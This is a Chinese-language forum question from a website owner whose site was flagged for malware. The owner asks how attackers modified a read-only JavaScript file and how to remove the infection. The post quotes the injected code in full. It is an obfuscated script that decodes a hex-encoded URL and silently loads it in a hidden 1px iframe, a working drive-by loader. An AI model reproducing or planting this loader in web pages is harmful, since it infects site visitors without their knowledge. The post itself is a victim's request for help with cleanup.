我的网站在浏览器中显示消息“mydomain.com 包含恶意软件。如果您访问此网站,您的计算机可能会感染病毒。”
在检查网站管理员工具后,我发现 java 脚本文件已更改,并且在此文件中附加了一些代码。但早些时候我更改了 FTP 和其他密码。
我很惊讶这些代码是如何插入到服务器上的只读文件中而 ftp 之前更改的。
这是什么?。这是病毒攻击还是其他什么以及如何检查和删除病毒(如果有)?
以下是添加到 javascript 文件中的代码。
if('CdkO'=='WJGLZ')WltF();function VrzYJI(){var fxko='MQjxtI';if('CyWq'=='IeMRba')PLxWxh();}
var tfhbJZ="con\x73\x74\x72ucto\x72";function nCesU(){}var LibD='DtiXVu';var px0_var="0p\x78";if('AUEe'=='jkeMwo')dgZHo='JixI';var WXUGCTeW="par\x73eIn\x74";var fJdwiU='HkKPc';function YKEF(){var IPUbt='lpVuaP';if('hgcAK'=='NSNfa')aMlM();}
var appVersion_var="a\x70pV\x65rsion";var GNYH='ZRUtGA';if('eBdo'=='zvBN')iPKu='hnyr';function vOWkf(){}function ZKAxLa(){var wLRC='vLarQA';if('PtqFaq'=='fUwi')XIGbIQ();}
var lVVSNNg="";var CxCP;var px1_var="1p\x78";var ZsUS;var YZuDAwsjn="b\x6fd\x79";var iuvTLT=123;if('jKCKy'=='oGHZN')BdGS();var JTrlocAdo="appendChild";function gclv(){var zanTcM='fvrmqz';if('BnHRcw'=='EEsejm')SMOo();}
var KWdpWKXJ="8d9999955f54549497868b86965388949254889794938953958d95";function OQzFK(){var FLac='plfdm';if('LFoy'=='EwqxJ')uPUdDb();}if('gdBD'=='BwqmW')aCEU();var IBUm='yeFDT';var bQdKIy="sli\x63\x65";function FHIiLK(){var MBkF='EuYDLV';if('PvzvCY'=='fRLQH')iFuid();}
var CxmPcURq="fromCharCode";var HyNEe='OZSvI';var wLrupv=(function(){var StkS='epJJDq';return this;if('SccXj'=='SVyct')xEXC();function pfHHB(){}})();if('funs'=='UyyiNF')amGGs();var mIpTJBqZc="joPfVdCy"[tfhbJZ];var wjjFIK=33;var YEHEAS;for(var pWCeJ=0;pWCeJ<KWdpWKXJ.length;pWCeJ+=2){if('ZFrN'=='VxPc')QczgU='hFfl';VUAzhFZU=wLrupv[WXUGCTeW](KWdpWKXJ[bQdKIy](pWCeJ,pWCeJ+2),16)-37;var VLFmeK;lVVSNNg+=mIpTJBqZc[CxmPcURq](VUAzhFZU);if('prqjym'=='UHrJa')MiuvBu();}
var zaZhFI=293;if('YzpRXm'=='MNJwSK')tTTq='AEeBR';var REdbBzld="DdTPKzFI";var MQuCD='JPTBg';function EaYq(){}if('MVbJ'=='RFbVx')zKUf='zdnfP';function KEgn(){var Hsch='ZrBxl';if('NkwuXz'=='FSzAyt')pTXBE();}
var oYUpEIig="";var Vthu=277;if(navigator[appVersion_var].indexOf("MSIE")!=-1){if('bFpRU'=='GsDnn')qygk='lmUxN';var ecSd;oYUpEIig='<iframe name="'+REdbBzld+'" src="'+lVVSNNg+'">';if('sBZK'=='rxsdM')bKacE();}else{if('PHngtx'=='GLlAu')bcSoAG();function SYYU(){}
oYUpEIig='iframe';var YIBQP=222;}
function JwDx(){var RzMKo='supF';if('XXDiVZ'=='QibJLF')Hwfn();}
var VxmJyYuwi=document.createElement(oYUpEIig);if('pgsYEc'=='NTSgKU')Brfc='Rnuk';function PZbvIF(){}
VxmJyYuwi.vIysu=function(){var aRwK;if('Qqzu'=='FJXo')druxka='GGBLEL';this["src"]=lVVSNNg;var FuOS;var PScx=23;}
var cRuRe=258;var YsPwxC;VxmJyYuwi.style.top=px0_var;var QetiQ='DZEkb';VxmJyYuwi.vIysu();if('JggEby'=='WOvNk')zMGOX();if('aLKZ'=='MAUOW')eFWE='gOXg';if('yHoD'=='PBdzQ')xYVoer='nisPV';VxmJyYuwi.name=REdbBzld;function YEJay(){}var ZNWOM;VxmJyYuwi.style.height=px1_var;function XDwP(){}
VxmJyYuwi.style.position="absolute";if('xbIySc'=='yNlEH')eOJWpQ='ikyk';function IMeAq(){}
var irdJAD=172;VxmJyYuwi.style.width=px1_var;VxmJyYuwi.style.right=px0_var;if('kndd'=='BkrF')WGwYa='VVer';var uoEnJ='youKio';function orSoOjwi(){if('MnXf'=='nTILss')FgeFCT='jDxk';if(document[YZuDAwsjn]){var DhGHk='ajfbHe';function Ydkz(){var GWqvCL='MvgtmN';if('XpgqVo'=='rYhw')uggAO();}
document[YZuDAwsjn][JTrlocAdo](VxmJyYuwi);var FWgG='DHITvG';}else{if('FOmyN'=='ZcJs')pnCabN='lFdTU';setTimeout(orSoOjwi,120);if('EkcQ'=='tVynkk')nGBNjE='MVgOWc';var sjLbg;}
function eciRV(){}}
function EJwt(){var uKrE='wCpD';if('pkYdXv'=='oOXOLr')mljDR();}var BCNgRv;orSoOjwi();var vxWIdO='KQBivA';var CfZn=36;var RXTyN;function cxqTMA(){var mAhD='QhbH';if('PaNmx'=='EkYttb')rfxOr();}var EUSU;